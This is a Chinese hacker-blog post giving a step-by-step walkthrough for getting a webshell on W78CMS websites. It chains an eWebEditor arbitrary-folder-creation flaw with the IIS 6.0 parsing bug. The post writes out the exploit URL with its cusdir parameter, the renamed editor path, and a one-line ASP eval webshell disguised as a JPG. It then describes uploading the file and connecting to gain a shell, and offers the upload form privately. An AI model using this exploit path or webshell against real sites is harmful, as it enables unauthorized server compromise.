危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18982083

W78cms网站管理系统漏洞

W78CMS企业网站管理系统是一套用的比较多的基于ASP程序的网站管理系统,在中国站长站的源程序下载量突破了一万一千次。前几天在tOOls.net看到有人公布了一个W78CMS企业网站管理系统的Oday,危险漫步下载了最新版本的W78CMS企业网站管理系统,在虚拟机里测试了一下,漏洞确实存在,利用漏洞可以很轻松的拿到shell。具体是什么漏洞呢?下面危险漫步就介绍给大家。

一、漏洞简介

这个漏洞我看到的是残冰公布的。问题出在W78CMS企业网站管理系统用的编辑器上,W78CMS企业网站管理系统用的编辑器是ewebeditor,说到ewebeditor当然不是以前普通的进后台拿shell的漏洞了,是一个可以创建任意文件夹的漏洞,通过创建类似x.asp名字的文件夹,再配合IIS 6.0的解析漏洞,可以拿到shell。当然,服务器用的WEB服务器必须是IIS 6.0,好在现在绝大多数运行ASP程序的WEB服务器都是IIS 6.0,这个条件很容易满足。

ewebeditor的这个漏洞有人说只存在于ewebeditor5.5-6.0,我没验证,呵呵。关于漏洞的介绍就简单说到这里,下面来看漏洞利用方法。

二、漏洞利用

目前W78CMS企业网站管理系统的最新版本是W78CMS企业网站管理系统v2.7.5,我下载了W78CMS企业网站管理系统v2.7.5 GBK的源代码在虚拟机的Windows 系统中用IIS 6.0搭建了一个测试环境。

下面来利用漏洞,漏洞公布者残冰给出的漏洞利用方法是在采用W78CMS企业网站管理系统的网站地址后面加上/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=0855Hack.asp就会在uploadfile目录下创建名为0855Hack.asp的文件夹,我们的博客不是危险漫步嘛,我它创建的文件夹名为wxmb.asp,所以在虚拟机里的测试环境中创建文件夹的地址应该在里面,用IE打开这个地址,却显示“无法找到该页”。

怎么回事呢?来到网站根目录下.打开admin文件夹,发现里面没有名为Editor的文件夹,却有一个名为w78eWebEditor的文件夹。

看来残冰发现漏洞的W78CMS企业网站管理系统和我虚拟机里测试的不是一个版本,我用的这个把编辑器目录的名字改为了w78eWebEditor。把刚才地址中的Editor改为w78eWebEditor,新的创建文件夹的地址用浏览器打开,这次没有错误提示,显示了一个空白页。

打开uploadfil目录,发现wxmb.asp文件夹已经创建成功了。

wxmb.asp文件夹创建成功了,下面来上传一个图片格式的一句话木马到x.asp文件夹下。把<%evalrequest("wxmb”)%>保存在一个文本文件中,然后把这个文本文件重命名为x.jpg。上传用到的是一个html文件,是一个tOOls的同学提供的,代码在这里就不再赘述了,想要的可以私聊来找我要。

其中是我虚拟机中测试网站的地址,wxmb.asp是刚才创建的文件夹名字,你在上传时修改成对应的网站地址和创建的文件夹的名字就好了。

我把上面的代码保存为w78cms_upload.html,用浏览器打开。

通过“浏览”按钮选择刚才制作的文件wxmb.jpg,点“upload”按钮把wxmb.jpg进行上传后又显示了空白页,现在不知道文件上传上去了没有,更不知道文件上传到了哪里和上传后文件的名字,别急,在空白页面处右键然后选择“查看源文件”,上传目录和文件的名字都有了。

上传上去的文件访问地址用lake2的eval最小马发送端连接,顺利得到shell。

严格说来这个漏洞应该是ewebeditor的漏洞,但因为W78CMS企业网站管理系统采用了存在漏洞的ewebeditor,就成了W78CMS企业网站管理系统的漏洞了。安全是一个整体,局部的漏洞可能导致整体安全的沦陷。